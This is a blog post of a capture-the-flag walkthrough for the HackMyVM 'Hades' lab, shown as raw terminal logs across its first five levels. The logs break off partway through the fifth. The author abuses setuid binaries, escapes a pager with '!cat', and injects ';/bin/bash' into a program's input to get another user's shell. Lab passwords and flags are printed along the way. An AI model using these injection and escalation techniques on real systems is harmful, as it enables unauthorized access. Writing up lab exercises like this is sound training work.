{"id":720,"date":"2024-07-06T16:34:09","date_gmt":"2024-07-06T08:34:09","guid":{"rendered":"http:\/\/162.14.82.114\/?p=720"},"modified":"2024-07-06T16:34:09","modified_gmt":"2024-07-06T08:34:09","slug":"hmvlabs-hades1-10","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/720\/07\/06\/2024\/","title":{"rendered":"HMVLabs-Hades(1-10)"},"content":{"rendered":"

1 hacker<\/h2>\n
\n

Host: hades.hackmyvm.eu
\nPort: 6666
\nUser: hacker
\nPass: begood!<\/p>\n<\/blockquote>\n

C:\\Users\\Administrator>ssh hacker@hades.hackmyvm.eu -p 6666\nThe authenticity of host '[hades.hackmyvm.eu]:6666 ([185.233.104.77]:6666)' can't be established.\nECDSA key fingerprint is SHA256:ogY5Idln+pWh6WlnoFaMXjT9106jRgnOot3hq7N\/W0Q.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added '[hades.hackmyvm.eu]:6666,[185.233.104.77]:6666' (ECDSA) to the list of known hosts.\n\n                                                      .     **\n                                                   *           *.\n                                                                  ,*\n                                                                     *,\n                                             ,                         ,*\n                                          .,                              *,\n                                       \/                                    *\n                                    ,*                                        *,\n                                 \/.                                            .*.\n                                                                _____\n                __     __           _____         ____________      _____\\    \\            _____\n                \/  \\   \/  \\        \/      |_       \\           \\    \/    \/ |    |      _____\\    \\\n                \/   \/| |\\   \\      \/         \\       \\           \\  \/    \/  \/___\/|     \/    \/ \\    |\n                \/   \/\/   \\   \\    |     \/\\    \\       |    \/\\     ||    |__ |___|\/    |    |  \/___\/|\n                \/    \\_____\/    \\   |    |  |    \\      |   |  |    ||       \\       ____\\    \\ |   ||\n                \/    \/\\_____\/\\    \\  |     \\\/      \\     |    \\\/     ||     __\/ __   \/    \/\\    \\|___|\/\n                \/    \/\/\\_____\/\\    \\ |\\      \/\\     \\   \/           \/||\\    \\  \/  \\ |    |\/ \\    \\\n                \/____\/ |       | \\____\\| \\_____\\ \\_____\\ \/___________\/ || \\____\\\/    ||\\____\\ \/____\/|\n                |    | |       | |    || |     | |     ||           | \/ | |    |____\/|| |   ||    | |\n                |____|\/         \\|____| \\|_____|\\|_____||___________|\/   \\|____|   | | \\|___||____|\/\n                                                                        |___|\/\n\n                                       **                                    **.\n                                          ,*                                **\n                                             *,                          ,*\n                                                *                      **\n                                                *,                .*\n                                                   *.           **\n                                                      **      ,*,\n                                                         ** *,\n                                        [== HMVLabs Chapter 2: Hades ==]\n\n                                         +===========================+\n                                         |        Respect &          |\n                                         |        Have fun!          |\n                                         |                           |\n                                         | https:\/\/hackmyvm.eu\/hades |\n                                         +===========================+\n\nhacker@hades.hackmyvm.eu's password:\nLinux hades 5.10.0-13-amd64 #1 SMP Debian 5.10.106-1 (2022-03-17) x86_64\n\n                                                      .     **\n                                                   *           *.\n                                                                  ,*\n                                                                     *,\n                                             ,                         ,*\n                                          .,                              *,\n                                       \/                                    *\n                                    ,*                                        *,\n                                 \/.                                            .*.\n                                                                _____\n                __     __           _____         ____________      _____\\    \\            _____\n                \/  \\   \/  \\        \/      |_       \\           \\    \/    \/ |    |      _____\\    \\\n                \/   \/| |\\   \\      \/         \\       \\           \\  \/    \/  \/___\/|     \/    \/ \\    |\n                \/   \/\/   \\   \\    |     \/\\    \\       |    \/\\     ||    |__ |___|\/    |    |  \/___\/|\n                \/    \\_____\/    \\   |    |  |    \\      |   |  |    ||       \\       ____\\    \\ |   ||\n                \/    \/\\_____\/\\    \\  |     \\\/      \\     |    \\\/     ||     __\/ __   \/    \/\\    \\|___|\/\n                \/    \/\/\\_____\/\\    \\ |\\      \/\\     \\   \/           \/||\\    \\  \/  \\ |    |\/ \\    \\\n                \/____\/ |       | \\____\\| \\_____\\ \\_____\\ \/___________\/ || \\____\\\/    ||\\____\\ \/____\/|\n                |    | |       | |    || |     | |     ||           | \/ | |    |____\/|| |   ||    | |\n                |____|\/         \\|____| \\|_____|\\|_____||___________|\/   \\|____|   | | \\|___||____|\/\n                                                                        |___|\/\n\n                                       **                                    **.\n                                          ,*                                **\n                                             *,                          ,*\n                                                *                      **\n                                                *,                .*\n                                                   *.           **\n                                                      **      ,*,\n                                                         ** *,\n                                        [== HMVLabs Chapter 2: Hades ==]\n\n                                         +===========================+\n                                         |        Respect &          |\n                                         |        Have fun!          |\n                                         |                           |\n                                         | https:\/\/hackmyvm.eu\/hades |\n                                         +===========================+\n\nLast login: Mon Jul  1 09:28:47 2024 from 223.102.189.154\nhacker@hades:~$ ls -la\ntotal 32\ndrwxr-x--- 2 root   hacker 4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root   root   4096 Apr  5 06:36 ..\n-rw-r--r-- 1 hacker hacker  220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 hacker hacker 3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 hacker hacker  807 Apr 23  2023 .profile\n-rw-r----- 1 root   hacker  194 Apr  5 06:36 mission.txt\n-rw-r----- 1 root   hacker 2625 Apr  5 06:36 readme.txt\nhacker@hades:~$ cat mission.txt \n################\n# MISSION 0x01 #\n################\n\n## EN ##\nUser acantha has left us a gift to obtain her powers.\n\n## ES ##\nLa usuaria acantha nos ha dejado un regalo para obtener sus poderes.\nhacker@hades:~$ cat readme.txt \n\n# EN\nHi hax0r,\nWelcome to HMVLab Chapter 2: Hades!\nThis is a slightly more advanced CTF than Chapter 1 where you will continue to practice your Linux and CTF skills\nso let's keep messing around! :)\nRemember that the home of each user is in \/pwned\/USER and in it you will find a file called mission.txt which will contain\nthe mission to complete to get the password of the next user.\nIt will also contain the file flagz.txt, which if you are registered at https:\/\/hackmyvm.eu you can enter to participate in the ranking (optional).\nAnd to continue the improvisation, there are more secret levels and hidden flags: D\nYou will not have write permissions in most folders so if you need to write a script or something\nuse the \/tmp folder, keep in mind that it is frequently deleted ...\n\nAnd last (and not least) some users can modify the files that are in the\nfolder \/www, these files are accessible from http:\/\/hades.hackmyvm.eu so if you get a user\nthat can modify the file \/www\/limbo.txt, you can put a message and it will be reflected in http:\/\/hades.hackmyvm.eu\/limbo.txt.\n\nIf you have questions\/ideas or want to comment anything you can join\nto our Discord: https:\/\/discord.gg\/DxDFQrJ\n\nRemember that there are more people playing so be respectful.\nHack & Fun!\n\n# ES\nHola hax0r,\nBienvenid@ al HMVLab Chapter 2: Hades!\nEste es un CTF algo mas avanzado que el Chapter 1 donde continuaras practicando tus habilidades de Linux y CTF\nasi que vamos a seguir trasteado! :)\nRecuerda que, el home de cada usuario se encuentra en \/pwned\/USUARIO y en el encontraras un fichero llamado mission.txt el cual contendra\nla mision a completar para conseguir la password del siguiente usuario.\nTambien contendra el fichero flagz.txt, que si estas registrado en https:\/\/hackmyvm.eu podras introducir para participar en el ranking (opcional).\nY para que continue la improvisacion, hay mas niveles secretos y flags escondidas :D\nNo tendras permisos de escritura en la mayoria de carpetas asi que si necesitas escribir algun script o algo\nusa la carpeta \/tmp, ten en cuenta que es eliminada de manera frecuente...\n\nY por ultimo (y no menos importante) algunos usuarios pueden modificar los ficheros que estan en la\ncarpeta \/www, estos ficheros son accesibles desde http:\/\/hades.hackmyvm.eu asi que si consigues un usuario\nque pueda modificar el fichero \/www\/limbo.txt, podras poner un mensaje y se ver\u00e1 reflejado en http:\/\/hades.hackmyvm.eu\/limbo.txt.\n\nSi tienes dudas\/ideas o quieres comentar cualquier cosa puedes unirte\na nuestro Discord: https:\/\/discord.gg\/DxDFQrJ\n\nRecuerda que hay mas gente jugando asi que se respetuoso.\nHack & Fun!\nhacker@hades:~$ find \/ -name "*gift*" -type f 2>\/dev\/null\n\/usr\/share\/man\/man1\/giftopnm.1.gz\n\/usr\/bin\/giftopnm\n\/opt\/gift_hacker\nhacker@hades:~$ file \/opt\/gift_hacker\n-bash: file: command not found\nhacker@hades:~$ strings \/opt\/gift_hacker \n\/lib64\/ld-linux-x86-64.so.2\nsetgid\nsetuid\nsystem\n__libc_start_main\n__cxa_finalize\nlibc.so.6\nGLIBC_2.2.5\nGLIBC_2.34\n_ITM_deregisterTMCloneTable\n__gmon_start__\n_ITM_registerTMCloneTable\nPTE1\nu+UH\n^uTkpiKdH\nklxweBgsH\nsprxyK^\n\/bin\/bash\n;*3$"\nGCC: (Debian 12.2.0-14) 12.2.0\nScrt1.o\n__abi_tag\ncrtstuff.c\nderegister_tm_clones\n__do_global_dtors_aux\ncompleted.0\n__do_global_dtors_aux_fini_array_entry\nframe_dummy\n__frame_dummy_init_array_entry\ngift_hacker.c\n__FRAME_END__\n_DYNAMIC\n__GNU_EH_FRAME_HDR\n_GLOBAL_OFFSET_TABLE_\n__libc_start_main@GLIBC_2.34\n_ITM_deregisterTMCloneTable\n_edata\n_fini\nsystem@GLIBC_2.2.5\n__data_start\n__gmon_start__\n__dso_handle\n_IO_stdin_used\n_end\n__bss_start\nmain\nsetgid@GLIBC_2.2.5\n__TMC_END__\n_ITM_registerTMCloneTable\nsetuid@GLIBC_2.2.5\n__cxa_finalize@GLIBC_2.2.5\n_init\n.symtab\n.strtab\n.shstrtab\n.interp\n.note.gnu.property\n.note.gnu.build-id\n.note.ABI-tag\n.gnu.hash\n.dynsym\n.dynstr\n.gnu.version\n.gnu.version_r\n.rela.dyn\n.rela.plt\n.init\n.plt.got\n.text\n.fini\n.rodata\n.eh_frame_hdr\n.eh_frame\n.init_array\n.fini_array\n.dynamic\n.got.plt\n.data\n.bss\n.comment\nhacker@hades:~$ cd \/opt   \nhacker@hades:\/opt$ ls -la\ntotal 28\ndrwxr-xr-x 1 root   root    4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root   root    4096 May 24 18:23 ..\n-rwSr-s--- 1 root   hacker 16064 Apr  5 06:36 gift_hacker\n-r--r----- 1 ianthe ianthe    21 Apr  5 06:36 ianthe_pass.txt\nhacker@hades:\/opt$ cat ianthe_pass.txt \ncat: ianthe_pass.txt: Permission denied\nhacker@hades:\/opt$ .\/gift_hacker       \nacantha@hades:\/opt$<\/code><\/pre>\n
2 acantha<\/h2>\n
acantha@hades:\/opt$ cd ~\nacantha@hades:~$ ls -la\ntotal 32\ndrwxr-x--- 2 root   hacker 4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root   root   4096 Apr  5 06:36 ..\n-rw-r--r-- 1 hacker hacker  220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 hacker hacker 3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 hacker hacker  807 Apr 23  2023 .profile\n-rw-r----- 1 root   hacker  194 Apr  5 06:36 mission.txt\n-rw-r----- 1 root   hacker 2625 Apr  5 06:36 readme.txt\nacantha@hades:~$ cat mission.txt \n################\n# MISSION 0x01 #\n################\n\n## EN ##\nUser acantha has left us a gift to obtain her powers.\n\n## ES ##\nLa usuaria acantha nos ha dejado un regalo para obtener sus poderes.\nacantha@hades:~$ cat readme.txt \n\n# EN\nHi hax0r,\nWelcome to HMVLab Chapter 2: Hades!\nThis is a slightly more advanced CTF than Chapter 1 where you will continue to practice your Linux and CTF skills\nso let's keep messing around! :)\nRemember that the home of each user is in \/pwned\/USER and in it you will find a file called mission.txt which will contain\nthe mission to complete to get the password of the next user.\nIt will also contain the file flagz.txt, which if you are registered at https:\/\/hackmyvm.eu you can enter to participate in the ranking (optional).\nAnd to continue the improvisation, there are more secret levels and hidden flags: D\nYou will not have write permissions in most folders so if you need to write a script or something\nuse the \/tmp folder, keep in mind that it is frequently deleted ...\n\nAnd last (and not least) some users can modify the files that are in the\nfolder \/www, these files are accessible from http:\/\/hades.hackmyvm.eu so if you get a user\nthat can modify the file \/www\/limbo.txt, you can put a message and it will be reflected in http:\/\/hades.hackmyvm.eu\/limbo.txt.\n\nIf you have questions\/ideas or want to comment anything you can join\nto our Discord: https:\/\/discord.gg\/DxDFQrJ\n\nRemember that there are more people playing so be respectful.\nHack & Fun!\n\n# ES\nHola hax0r,\nBienvenid@ al HMVLab Chapter 2: Hades!\nEste es un CTF algo mas avanzado que el Chapter 1 donde continuaras practicando tus habilidades de Linux y CTF\nasi que vamos a seguir trasteado! :)\nRecuerda que, el home de cada usuario se encuentra en \/pwned\/USUARIO y en el encontraras un fichero llamado mission.txt el cual contendra\nla mision a completar para conseguir la password del siguiente usuario.\nTambien contendra el fichero flagz.txt, que si estas registrado en https:\/\/hackmyvm.eu podras introducir para participar en el ranking (opcional).\nY para que continue la improvisacion, hay mas niveles secretos y flags escondidas :D\nNo tendras permisos de escritura en la mayoria de carpetas asi que si necesitas escribir algun script o algo\nusa la carpeta \/tmp, ten en cuenta que es eliminada de manera frecuente...\n\nY por ultimo (y no menos importante) algunos usuarios pueden modificar los ficheros que estan en la\ncarpeta \/www, estos ficheros son accesibles desde http:\/\/hades.hackmyvm.eu asi que si consigues un usuario\nque pueda modificar el fichero \/www\/limbo.txt, podras poner un mensaje y se ver\u00e1 reflejado en http:\/\/hades.hackmyvm.eu\/limbo.txt.\n\nSi tienes dudas\/ideas o quieres comentar cualquier cosa puedes unirte\na nuestro Discord: https:\/\/discord.gg\/DxDFQrJ\n\nRecuerda que hay mas gente jugando asi que se respetuoso.\nHack & Fun!\nacantha@hades:~$ whoami;id\nacantha\nuid=2043(acantha) gid=2001(hacker) groups=2001(hacker)\nacantha@hades:~$ find \/ -user acantha -type f 2>\/dev\/null\n\/proc\/3819214\/task\/3819214\/fdinfo\/0\n\/proc\/3819214\/task\/3819214\/fdinfo\/1\n\/proc\/3819214\/task\/3819214\/fdinfo\/2\n........\n\/proc\/3819230\/timerslack_ns\n\/proc\/3819230\/patch_state\n\/proc\/3819230\/arch_status\n\/pazz\/acantha_pass.txt\nacantha@hades:~$ cat \/pazz\/acantha_pass.txt              \nmYYLhLBSkrzZqFydxGkn\nacantha@hades:~$ su -l acantha\nbash: \/usr\/bin\/su: Permission denied\nacantha@hades:~$ ssh acantha@0.0.0.0\nhostkeys_find_by_key_hostfile: hostkeys_foreach failed for \/pwned\/acantha\/.ssh\/known_hosts: Permission denied\nThe authenticity of host '0.0.0.0 (0.0.0.0)' can't be established.\nED25519 key fingerprint is SHA256:5QshhvvnibVTWOxgK9XbUejVSLahU6clfnK1Iku0wsg.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nCould not stat \/pwned\/acantha\/.ssh: Permission denied\nFailed to add the host to the list of known hosts (\/pwned\/acantha\/.ssh\/known_hosts).\n\n                                                      .     **\n                                                   *           *.\n                                                                  ,*\n                                                                     *,\n                                             ,                         ,*\n                                          .,                              *,\n                                       \/                                    *\n                                    ,*                                        *,\n                                 \/.                                            .*.\n                                                                _____\n                __     __           _____         ____________      _____\\    \\            _____\n                \/  \\   \/  \\        \/      |_       \\           \\    \/    \/ |    |      _____\\    \\\n                \/   \/| |\\   \\      \/         \\       \\           \\  \/    \/  \/___\/|     \/    \/ \\    |\n                \/   \/\/   \\   \\    |     \/\\    \\       |    \/\\     ||    |__ |___|\/    |    |  \/___\/|\n                \/    \\_____\/    \\   |    |  |    \\      |   |  |    ||       \\       ____\\    \\ |   ||\n                \/    \/\\_____\/\\    \\  |     \\\/      \\     |    \\\/     ||     __\/ __   \/    \/\\    \\|___|\/\n                \/    \/\/\\_____\/\\    \\ |\\      \/\\     \\   \/           \/||\\    \\  \/  \\ |    |\/ \\    \\\n                \/____\/ |       | \\____\\| \\_____\\ \\_____\\ \/___________\/ || \\____\\\/    ||\\____\\ \/____\/|\n                |    | |       | |    || |     | |     ||           | \/ | |    |____\/|| |   ||    | |\n                |____|\/         \\|____| \\|_____|\\|_____||___________|\/   \\|____|   | | \\|___||____|\/\n                                                                        |___|\/\n\n                                       **                                    **.\n                                          ,*                                **\n                                             *,                          ,*\n                                                *                      **\n                                                *,                .*\n                                                   *.           **\n                                                      **      ,*,\n                                                         ** *,\n                                        [== HMVLabs Chapter 2: Hades ==]\n\n                                         +===========================+\n                                         |        Respect &          |\n                                         |        Have fun!          |\n                                         |                           |\n                                         | https:\/\/hackmyvm.eu\/hades |\n                                         +===========================+\n\nacantha@0.0.0.0's password:\nclient_input_hostkeys: hostkeys_foreach failed for \/pwned\/acantha\/.ssh\/known_hosts: Permission denied\nLinux hades 5.10.0-13-amd64 #1 SMP Debian 5.10.106-1 (2022-03-17) x86_64\n\n                                                      .     **\n                                                   *           *.\n                                                                  ,*\n                                                                     *,\n                                             ,                         ,*\n                                          .,                              *,\n                                       \/                                    *\n                                    ,*                                        *,\n                                 \/.                                            .*.\n                                                                _____\n                __     __           _____         ____________      _____\\    \\            _____\n                \/  \\   \/  \\        \/      |_       \\           \\    \/    \/ |    |      _____\\    \\\n                \/   \/| |\\   \\      \/         \\       \\           \\  \/    \/  \/___\/|     \/    \/ \\    |\n                \/   \/\/   \\   \\    |     \/\\    \\       |    \/\\     ||    |__ |___|\/    |    |  \/___\/|\n                \/    \\_____\/    \\   |    |  |    \\      |   |  |    ||       \\       ____\\    \\ |   ||\n                \/    \/\\_____\/\\    \\  |     \\\/      \\     |    \\\/     ||     __\/ __   \/    \/\\    \\|___|\/\n                \/    \/\/\\_____\/\\    \\ |\\      \/\\     \\   \/           \/||\\    \\  \/  \\ |    |\/ \\    \\\n                \/____\/ |       | \\____\\| \\_____\\ \\_____\\ \/___________\/ || \\____\\\/    ||\\____\\ \/____\/|\n                |    | |       | |    || |     | |     ||           | \/ | |    |____\/|| |   ||    | |\n                |____|\/         \\|____| \\|_____|\\|_____||___________|\/   \\|____|   | | \\|___||____|\/      \n                                                                        |___|\/\n\n                                       **                                    **.\n                                          ,*                                **\n                                             *,                          ,*\n                                                *                      **\n                                                *,                .*\n                                                   *.           **\n                                                      **      ,*,\n                                                         ** *,\n                                        [== HMVLabs Chapter 2: Hades ==]\n\n                                         +===========================+\n                                         |        Respect &          |\n                                         |        Have fun!          |\n                                         |                           |\n                                         | https:\/\/hackmyvm.eu\/hades |\n                                         +===========================+\n\nLast login: Sun Jun 30 11:48:52 2024 from 223.102.189.154\nacantha@hades:~$ whoami;id\nacantha\nuid=2043(acantha) gid=2043(acantha) groups=2043(acantha)\nacantha@hades:~$ ls -la\ntotal 48\ndrwxr-x--- 2 root    acantha  4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root    root     4096 Apr  5 06:36 ..\n-rw-r--r-- 1 acantha acantha   220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 acantha acantha  3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 acantha acantha   807 Apr 23  2023 .profile\n-rw-r----- 1 root    acantha    22 Apr  5 06:36 flagz.txt\n-rw-r-x--- 1 root    acantha 16064 Apr  5 06:36 guess\n-rw-r----- 1 root    acantha   275 Apr  5 06:36 mission.txt\nacantha@hades:~$ cat flagz.txt \n^CaEuVJtJjaCwZtuuAFD^\nacantha@hades:~$ cat mission.txt \n################\n# MISSION 0x02 #\n################\n\n## EN ##\nThe user alala has left us a program, if we insert the 6 correct numbers, she gives us her password!\n\n## ES ##\nLa usuaria alala nos ha dejado un programa, si insertamos los 6 numeros correctos, nos da su password!\nacantha@hades:~$ grep -ra '\\^*\\^' .\n.\/flagz.txt:^CaEuVJtJjaCwZtuuAFD^\nacantha@hades:~$ strings guess     \n\/lib64\/ld-linux-x86-64.so.2\nputs\n__libc_start_main\n__cxa_finalize\nprintf\n__isoc99_scanf\nlibc.so.6\nGLIBC_2.7\nGLIBC_2.2.5\nGLIBC_2.34\n_ITM_deregisterTMCloneTable\n__gmon_start__\n_ITM_registerTMCloneTable\nPTE1\nu+UH\nEnter PIN code:\nDsYzpJQrCEndEWIMxWxu\nNO :_(\n;*3$"\nGCC: (Debian 12.2.0-14) 12.2.0\nScrt1.o\n__abi_tag\ncrtstuff.c\nderegister_tm_clones\n__do_global_dtors_aux\ncompleted.0\n__do_global_dtors_aux_fini_array_entry\nframe_dummy\n__frame_dummy_init_array_entry\nguess.c\n__FRAME_END__\n_DYNAMIC\n__GNU_EH_FRAME_HDR\n_GLOBAL_OFFSET_TABLE_\n__libc_start_main@GLIBC_2.34\n_ITM_deregisterTMCloneTable\nputs@GLIBC_2.2.5\n_edata\n_fini\nprintf@GLIBC_2.2.5\n__data_start\n__gmon_start__\n__dso_handle\n_IO_stdin_used\n_end\n__bss_start\nmain\n__isoc99_scanf@GLIBC_2.7\n__TMC_END__\n_ITM_registerTMCloneTable\n__cxa_finalize@GLIBC_2.2.5\n_init\n.symtab\n.strtab\n.shstrtab\n.interp\n.note.gnu.property\n.note.gnu.build-id\n.note.ABI-tag\n.gnu.hash\n.dynsym\n.dynstr\n.gnu.version\n.gnu.version_r\n.rela.dyn\n.rela.plt\n.init\n.plt.got\n.text\n.fini\n.rodata\n.eh_frame_hdr\n.eh_frame\n.init_array\n.fini_array\n.dynamic\n.got.plt\n.data\n.bss\n.comment<\/code><\/pre>\n
3 alala<\/h2>\n
acantha@hades:~$ su alala -l\n-bash: \/usr\/bin\/su: Permission denied\nacantha@hades:~$ ssh alala@0.0.0.0 \nThe authenticity of host '0.0.0.0 (0.0.0.0)' can't be established.\nED25519 key fingerprint is SHA256:5QshhvvnibVTWOxgK9XbUejVSLahU6clfnK1Iku0wsg.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nCould not create directory '\/pwned\/acantha\/.ssh' (Permission denied).\nFailed to add the host to the list of known hosts (\/pwned\/acantha\/.ssh\/known_hosts).\nalala@hades:~$ whoami;id\nalala\nuid=2044(alala) gid=2044(alala) groups=2044(alala)\nalala@hades:~$ ls -la\ntotal 52\ndrwxr-x--- 2 root   alala   4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root   root    4096 Apr  5 06:36 ..\n-rw-r--r-- 1 alala  alala    220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 alala  alala   3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 alala  alala    807 Apr 23  2023 .profile\n-r--r----- 1 althea althea    21 Apr  5 06:36 althea_pass.txt\n-rw-r----- 1 root   alala     22 Apr  5 06:36 flagz.txt\n-rw-r----- 1 root   alala    164 Apr  5 06:36 mission.txt\n-rwS--s--- 1 root   alala  16056 Apr  5 06:36 read\nalala@hades:~$ grep -ra "\\^*\\^" .\ngrep: .\/read: Permission denied\n.\/flagz.txt:^gTdGmkwhDrCqKrDQpxH^\ngrep: .\/althea_pass.txt: Permission denied\nalala@hades:~$ cat mission.txt \n################\n# MISSION 0x03 #\n################\n\n## EN ##\nUser althea loves reading Linux help.\n\n## ES ##\nA la usuaria althea le encanta leer la ayuda de Linux.\nalala@hades:~$ .\/read\nalala@hades:~$ ls\nalthea_pass.txt  flagz.txt  mission.txt  read\nalala@hades:~$ .\/read althea_pass.txt\nalala@hades:~$ .\/read\nalthea                            !whoami\n!done  (press RETURN)\nObxEmwisYjERrDfvSbdA              !cat althea_pass.txt\n!done  (press RETURN)<\/code><\/pre>\n
4 althea<\/h2>\n
althea@hades:~$ ls -la\ntotal 52\ndrwxr-x--- 2 root      althea     4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root      root       4096 Apr  5 06:36 ..\n-rw-r--r-- 1 althea    althea      220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 althea    althea     3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 althea    althea      807 Apr 23  2023 .profile\n-r--r----- 1 andromeda andromeda    21 Apr  5 06:36 andromeda_pass.txt\n-rw-r----- 1 root      althea       22 Apr  5 06:36 flagz.txt\n-rwS--s--- 1 root      althea    16216 Apr  5 06:36 lsme\n-rw-r----- 1 root      althea      205 Apr  5 06:36 mission.txt\nalthea@hades:~$ cat flagz.txt \n^btDtPAPzSiXmoHItpqX^\nalthea@hades:~$ cat mission.txt \n################\n# MISSION 0x04 #\n################\n\n## EN ##\nThe user andromeda has left us a program to list directories.\n\n## ES ##\nLa usuaria andromeda nos ha dejado un programa para listar directorios.\nalthea@hades:~$ grep -ra "\\^*\\^" .\n.\/flagz.txt:^btDtPAPzSiXmoHItpqX^\ngrep: .\/lsme: Permission denied\ngrep: .\/andromeda_pass.txt: Permission denied\nalthea@hades:~$ lsme\n-bash: lsme: command not found\nalthea@hades:~$ .\/lsme\nEnter file to check:\nandromeda_pass.txt\n-r--r----- 1 andromeda andromeda 21 Apr  5 06:36 andromeda_pass.txt\nSegmentation fault\nalthea@hades:~$ ls -la\ntotal 52\ndrwxr-x--- 2 root      althea     4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root      root       4096 Apr  5 06:36 ..\n-rw-r--r-- 1 althea    althea      220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 althea    althea     3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 althea    althea      807 Apr 23  2023 .profile\n-r--r----- 1 andromeda andromeda    21 Apr  5 06:36 andromeda_pass.txt\n-rw-r----- 1 root      althea       22 Apr  5 06:36 flagz.txt\n-rwS--s--- 1 root      althea    16216 Apr  5 06:36 lsme\n-rw-r----- 1 root      althea      205 Apr  5 06:36 mission.txt\nalthea@hades:~$ .\/lsme\nEnter file to check:\nandromeda_pass.txt\n-r--r----- 1 andromeda andromeda 21 Apr  5 06:36 andromeda_pass.txt\nSegmentation fault\nalthea@hades:~$ .\/lsme\nEnter file to check:\nandromeda_pass.txt;whoami\n-r--r----- 1 andromeda andromeda 21 Apr  5 06:36 andromeda_pass.txt\nandromeda\nSegmentation fault\nalthea@hades:~$ .\/lsme\nEnter file to check:\nandromeda_pass.txt;\/bin\/bash\n-r--r----- 1 andromeda andromeda 21 Apr  5 06:36 andromeda_pass.txt\nandromeda@hades:~$ whoami;id\nandromeda\nuid=2046(andromeda) gid=2045(althea) groups=2045(althea)<\/code><\/pre>\n
5 andromeda<\/h2>\n
andromeda@hades:~$ ls -la\ntotal 52\ndrwxr-x--- 2 root      althea     4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root      root       4096 Apr  5 06:36 ..\n-rw-r--r-- 1 althea    althea      220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 althea    althea     3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 althea    althea      807 Apr 23  2023 .profile\n-r--r----- 1 andromeda andromeda    21 Apr  5 06:36 andromeda_pass.txt\n-rw-r----- 1 root      althea       22 Apr  5 06:36 flagz.txt\n-rwS--s--- 1 root      althea    16216 Apr  5 06:36 lsme\n-rw-r----- 1 root      althea      205 Apr  5 06:36 mission.txt\nandromeda@hades:~$ cat andromeda_pass.txt \nOTWGTbHzrxhYFSTlKcOt\nandromeda@hades:~$ grep -ra '\\^*\\^' .\n.\/flagz.txt:^btDtPAPzSiXmoHItpqX^\ngrep: .\/lsme: Permission denied\nandromeda@hades:~$ pwd\n\/pwned\/althea\nandromeda@hades:~$ cd ~\nandromeda@hades:~$ pwd\n\/pwned\/althea\nandromeda@hades:~$ ssh andromeda@0.0.0.0 \nhostkeys_find_by_key_hostfile: hostkeys_foreach failed for \/pwned\/andromeda\/.ssh\/known_hosts: Permission denied\nThe authenticity of host '0.0.0.0 (0.0.0.0)' can't be established.\nED25519 key fingerprint is SHA256:5QshhvvnibVTWOxgK9XbUejVSLahU6clfnK1Iku0wsg.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nCould not stat \/pwned\/andromeda\/.ssh: Permission denied\nFailed to add the host to the list of known hosts (\/pwned\/andromeda\/.ssh\/known_hosts).\n\n                                                      .     **\n                                                   *           *.\n                                                                  ,*\n                                                                     *,\n                                             ,                         ,*\n                                          .,                              *,\n                                       \/                                    *\n                                    ,*                                        *,\n                                 \/.                                            .*.\n                                                                _____\n                __     __           _____         ____________      _____\\    \\            _____\n                \/  \\   \/  \\        \/      |_       \\           \\    \/    \/ |    |      _____\\    \\\n                \/   \/| |\\   \\      \/         \\       \\           \\  \/    \/  \/___\/|     \/    \/ \\    |\n                \/   \/\/   \\   \\    |     \/\\    \\       |    \/\\     ||    |__ |___|\/    |    |  \/___\/|\n                \/    \\_____\/    \\   |    |  |    \\      |   |  |    ||       \\       ____\\    \\ |   ||\n                \/    \/\\_____\/\\    \\  |     \\\/      \\     |    \\\/     ||     __\/ __   \/    \/\\    \\|___|\/\n                \/    \/\/\\_____\/\\    \\ |\\      \/\\     \\   \/           \/||\\    \\  \/  \\ |    |\/ \\    \\\n                \/____\/ |       | \\____\\| \\_____\\ \\_____\\ \/___________\/ || \\____\\\/    ||\\____\\ \/____\/|\n                |    | |       | |    || |     | |     ||           | \/ | |    |____\/|| |   ||    | |\n                |____|\/         \\|____| \\|_____|\\|_____||___________|\/   \\|____|   | | \\|___||____|\/\n                                                                        |___|\/\n\n                                       **                                    **.\n                                          ,*                                **\n                                             *,                          ,*\n                                                *                      **\n                                                *,                .*\n                                                   *.           **\n                                                      **      ,*,\n                                                         ** *,\n                                        [== HMVLabs Chapter 2: Hades ==]\n\n                                         +===========================+\n                                         |        Respect &          |\n                                         |        Have fun!          |\n                                         |                           |\n                                         | https:\/\/hackmyvm.eu\/hades |\n                                         +===========================+\n\nandromeda@0.0.0.0's password:\nclient_input_hostkeys: hostkeys_foreach failed for \/pwned\/andromeda\/.ssh\/known_hosts: Permission denied\nLinux hades 5.10.0-13-amd64 #1 SMP Debian 5.10.106-1 (2022-03-17) x86_64\n\n                                                      .     **\n                                                   *           *.\n                                                                  ,*\n                                                                     *,\n                                             ,                         ,*\n                                          .,                              *,\n                                       \/                                    *\n                                    ,*                                        *,\n                                 \/.                                            .*.\n                                                                _____\n                __     __           _____         ____________      _____\\    \\            _____\n                \/  \\   \/  \\        \/      |_       \\           \\    \/    \/ |    |      _____\\    \\\n                \/   \/| |\\   \\      \/         \\       \\           \\  \/    \/  \/___\/|     \/    \/ \\    |\n                \/   \/\/   \\   \\    |     \/\\    \\       |    \/\\     ||    |__ |___|\/    |    |  